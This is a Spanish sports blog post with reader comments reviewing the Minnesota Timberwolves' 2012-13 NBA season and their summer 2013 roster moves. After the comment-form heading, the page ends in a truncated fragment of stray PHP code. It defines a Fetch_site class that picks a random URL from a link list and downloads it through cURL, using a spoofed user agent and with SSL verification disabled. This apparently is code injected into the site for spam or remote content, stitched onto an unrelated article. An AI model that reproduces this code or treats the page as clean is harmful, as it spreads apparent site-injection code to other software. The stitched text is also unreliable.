Minnesota Timberwolves: Insuficiente

15 de July de 2013 por TheDeerHunter

Destacábamos en octubre las simpatías y las buenas sensaciones que nos transmitían los Wolves en aquel momento, lo que habíamos vibrado con ellos en algunos tramos de la temporada anterior y el optimismo generalizado que había respecto a la aparentemente probable vuelta a las eliminatorias esta misma campaña.

Descontando la conocida baja de Ricky para el comienzo del curso y la complicadísima recuperación de Roy, todo comenzó a estropearse muy pronto. Justo antes de comenzar la temporada, Kevin Love se fracturaba la mano en absurdas circunstancias durante un entreno. Tan sólo era la apertura oficial de la caja de los truenos en una estrambótica guerra entre él y la directiva, inmediatamente después de haberle firmado una merecida extensión de contrato. El tema venía de algunos meses atrás. En el ámbito olímpico Team USA, Kevin Love mostró públicamente su impaciencia respecto a la planificación del equipo. Con la lesión, David Kahn (general manager) y Glen Taylor (propietario) ajustaron cuentas y pusieron en duda la legitimidad de la lesión y la condición de estrella del jugador, recordándonos que nunca ha liderado a la franquicia hasta la postemporada. El resultado de la batalla hasta ahora ha sido una campaña prácticamente inédita de Love y el despido de Kahn a beneficio de Flip Sanders en lo que se ha escenificado como “la pipa de la paz” en Minneapolis. Lamentablemente algunas heridas no suelen cicatrizar tan fácilmente.

El mal karma se coló en el vestuario. Chase Budinger empezaba como un tiro pero no tardó en caer lesionado. Andrei Kirilenko y Nikola Pekovic también tuvieron que parar cuando mejor estaban. Tuvieron hasta que rescatar a Gelabale de Europa para ganar un mínimo de rotación. Lo bueno es que el viejo Adelman enfocó sabiamente el asunto poniéndoles como espejo en el que mirarse a los Warriors de la 11/12. De esta forma sostuvo la motivación y alejó las tentaciones de “tankeo” vil. El balance es malo pero digno dadas las circunstancias. 

En el aspecto positivo hemos visto una excelente versión de Pekovic, amasando contratazo, y también de Kirilenko quien buscaba recuperar cartel. Ridnour aportó solidez y profesionalidad en cada uno de los 82 partidos de la regular. Ricky volvió de forma ilusionante y con él hemos visto la mejor versión de Derrick Williams desde que llegó a la liga. Ese tramo final del dúo posiblemente salvó el cuello del segundo este verano en el equipo y quién sabe si en la liga. Tampoco podemos olvidar el gran inicio del ruso Alexey Shved.

A nuestros ojos los Wolves se han movido bien este verano. A pesar de perder un Kirilenko inasumible, han reforzado lo que les hacía falta, manteniendo las virtudes que les presuponíamos. Se da por hecho que mantendrán a Pekovic y hace pocos meses la llegada de Muhammad hubiera supuesto un auténtico bombazo. Veremos si los analistas han estado finos evaluándole. Así las cosas, tratando de ser cautos tras el batacazo, pensamos con más seguridad incluso que él año pasado que en el próximo debería de producirse la vuelta de de los Wolves a la verdadera competición. Veremos si se dan las condiciones.

PREMIOS 

MVP: Extraordinaria temporada de Nikola Pekovic, de largo el mejor del equipo este año. Con esa contagiosa tenacidad ha sacado petróleo de sus condiciones, consolidándose como uno de los hombres grandes mejor valorados. Tenemos ganas de volver a verle formar pareja con el verdadero Love. Se da por hecho que seguirá en el equipo a pesar de ser uno de los agentes libres más deseados de este verano. La clausula “restricted” protege a Minnesota de un grave  problema.

Rookie: Extraordinarios 3 primeros meses de competición de Alexey Shved, demostrando que puede jugar en esta liga. El rookie wall y la desmotivación por los resultados le hicieron caer en una espiral terrible el resto del curso. Creemos que lo suyo es más de lo primero que de lo segundo.

Sorpresa: Seguimos confiando en que Derrick Williams va a terminar dando alegrías a los que apostaron por él. Pésimo comienzo de campaña pero hay que observar detenidamente sus números en el 2013. Parece ir relacionado a la vuelta a las pistas de cierto excelso pasador. Ojo a este dúo en ciernes.

Decepción: 18 puntos y 14 rebotes son los magníficos promedios de Kevin Love en los 18 partidos que ha disputado este curso. Sin embargo las sensaciones son bastante más negativas. Le damos el beneficio de la duda… por sus problemas físicos.

Esfuerzo en vano: Luke Ridnour ha disputado de titular los 82 partidos del curso. Ha jugado de 1, de 2, o de lo que tocara aunque le perjudicara visiblemente desde el punto de vista individual. Un curso más que digno el suyo. Mucho más de lo que parece. Por no servirle, no le va a servir ni para seguir en el equipo.

JUGADO A GM

– Gran recurso el de la Qualifying Offer sobre Pekovic. No habían muchos en condiciones salariales de marear mucho al jugador con precios desorbitados pero mediante la opción de igualar han desanimado a algunos. De no llegar a acuerdo le mantenían otro año más por un coste ridículo pero al parecer todo se resolverá en torno a 50M$ en cuatro años. Viendo el coste habitual del hombre grande y a expensas de sus constantes problemas físicos parece un contrato razonable.

– Acierto al no tratar de mantener a Kirilenko. El ruso ha jugado muy bien pero salarialmente era imposible si se pretendía optar a Pekovic. Las bajas de Gelabale y Stiemsma también son para dejar hueco. Es el momento de dar más galones a Derrick Williams. Se comentó su posible salida pero esos rumores se han disipado bastante. Hay mucha expectación en su tercera campaña, a ser posible junto a Ricky desde el principio.

– Escepticismo en la elección de Shabazz Muhammad. Hace poco nadie hubiera tenido dudas de que era el gran robo del draft. La opción 14 no da para muchísimo más en el peor de los casos y si se acerca a las primeras impresiones que se tenía de él puede dar mucho que hablar.

– Polémica sobre los contratos de Budinger (18M$ en 3) y de Kevin Martin (30M$ en 4). Pueden ser algo caros teniendo en cuenta ciertas dudas que les afean pero ambos cuentan con un perfil muy adecuado a este contexto. Budinger ya lo ha demostrado cuando ha estado disponible. Martin brilló con Adelman tanto en Sacramento como en Houston. Desde nuestro punto de vista son un acierto.

– Tanto Ridnour como Barea llevan tiempo en el escaparate. Parece que Ridnour va rumbo de Milwaukee para facilitar la vuelta de Cory Brewer, que prácticamente cerraría la plantilla. Creo que Ridnour se ganó quedarse, al contrario que Barea del que sería bueno desprenderse. Veremos si los Wolves confían tanto en Lorenzo Brown como para atreverse.

Así parece que los Wolves de la 2013/14 están esencialmente cerrados. Éstas deberían ser las bazas que les devuelvan a la pomada:

PG: Rubio, Barea, Brown
SG: Martin, Shved
SF: Budinger, Muhammad, Brewer
PF: Love, Williams, Cunningham
C: Pekovic, Chris Johnson

Comenta

8 comentarios a esta entrada

  1. rumbero dice:
    #1

    La verdad es que han tenido tramos de la temporada con más minutos de los deseados para Gelabale, Chris Johsnon, Cunningham, Stiemsma, Shved y un Barea con barra libre para jugárselas cosa que no siempre es bueno. Hay que catearlos porque no queda otra pero volveremos a decir por enésima vez lo de “A ver si esta temporada podemos verlos más o menos sanos” y a ver si por fin llegan a PO.
    A mi el equipo me gusta. Martin y Budinger con Adelman siempre han rendido bien y la pareja Love-Pekovic puede ser de lo mejorcito de la liga. Para redondearlo estaría bien ver a un Ricky mucho más fino con el tiro y a un Derrick Williams que no sólo juegue bien cuando está el primero en pista.

      Citar

  2. Esteban dice:
    #2

    me gusta y mucho el equipo, si estan sanos son candidatos a PO

    love y pekovic puede ser la mejor dupla interior de la liga, mientras que martin sin tener que ser lider, puede funcionar bien

    depende todo de que ricky se confirme ya como un gran base, pues de chaval tiene poco y nad ay esta en su tercer temporada, y de que williams explote de una vez, sea como titular o sexto hombre o lo que sea

    me gustan los wolves, los veo en PO

      Citar

  3. Vader dice:
    #3

    Uno de los equipos más europeos (y más blancos) de la liga y por tanto no van sobrados de jugadores físicamente potentes. Es el único pero que les veo en una época en que en la NBA dominan los físicos estratosféricos. Con Adelman y un poquito de suerte deberían llegar a playoff. Si no fuera así podria ser el principio del final de Love en Minny…

    Saludos

      Citar

  4. Ruxixón dice:
    #4

    Después de LeBron mi jugador favorito es Love así que espero que en esta campaña aleje las lesiones y demuestre que puede ser el líder de este equipo,algo de lo que a día de hoy tengo dudas,más que nada por compromiso y demás.Esas rajadas que se metio bajo mi punto de vista no venían a cuento.

    Luego me gustan los jugadores que han traido pero veo ciertas incompatibilidades.No veo jugando al mismo tiempo a Kevin Martin y a Budinger(madres en defensa),y de la misma forma tengo muchas dudas con los minutos que recibirá Muhammad porque creo que hay que buscar equilibrio defensivo y en ese sentido me da más seguridad Brewer.Veremos qué rotación tiene preparada Adelman.

    Por lo demás la plantilla es un chollo para Ricky,con esos compañeros puede promediar > 10 asistencias todas las noches fácil.

      Citar

  5. Sancho88 dice:
    #5

    Creo que falta lo de Turiaf, pero como se ha firmado hace tan poco igual no cuadra con la entrega del resumen. Con él y Johnson parece que Pekovic tiene buenos recambios, aunque Stiemsma personalmente me gustaba más. Y después, yo también opino que Barea no les pega nada a estos Wolves, no va en la mecánica de grupo que intenta congeniar Adelman. Le pegaría más a equipos como Nets, Clippers o Knicks. Ciertamente Ridnour debe ser el que se quede, su compromiso es el 100%, como bien dices ha dado la cara durante los 82 partidos de liga regular y ha sido de los más serios del equipo junto a Pekovic, no merece irse.

    Cunningham también tiene buena pinta como 4 abierto. Es un jugador con una progresión muy alta, igual que D.Williams. El problema que los dos son 4 y Love también lo es. O juegan sin pívot o uno de los dos de 3… el frontcourt es de calidad. Con Turiaf parece que no hace falta nada más

      Citar

  6. Sancho88 dice:
    #6

    Ruxixon, por qué dices madre en defensa Budinger? Es un tío que sabe intimidar, tapona y coge rebotes defensivos. Vale que no tiene un gran desplazamiento defensivo, pero como alero alto intimida, puntea bien en defensa exterior y persigue a sus rivales… no sé, compararlo en ese aspecto con Martin no creo que sea justo….

      Citar

  7. Esteban dice:
    #7

    si los wolves arrancan mal la temporadan y rapidamente se ven fuera de PO, se viene un trade por LOVE?

    mucho cuidado que a love solo le quedan 2 años de contrato, dado que el tercero es opcion del jugador y podria salir al mercado como agente libre no restringido

    o los wolves se hacen verdaderamente fuertes o el proximo año estaremos con la novela de love al estilo howard, y ya vimos que lo que se paga por un jugador que esta a punto de salir al mercado no es mucho

    lastima que minesota tiene a ricky, que sino, un trade love por rondo tendria bastante sentido para ambas partes

      Citar

  8. Ruxixón dice:
    #8

    Sancho88:
    Ruxixon, por qué dices madre en defensa Budinger? Es un tío que sabe intimidar, tapona y coge rebotes defensivos. Vale que no tiene un gran desplazamiento defensivo, pero como alero alto intimida, puntea bien en defensa exterior y persigue a sus rivales… no sé, compararlo en ese aspecto con Martin no creo que sea justo….

    Seguramente me pasé al llamar madre en defensa a Budinger pero lo cierto es que sus fundamentos defensivos se limitan a su estatura.Y que conste que me encanta Budinger desde tiempos de Arizona,pero en lo que es.A mí es que no me gusta el fichaje de Kevin Martin,si es titular hay un boquete en la línea exterior que debe ser compensado y no creo que Budinger sea capaz.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>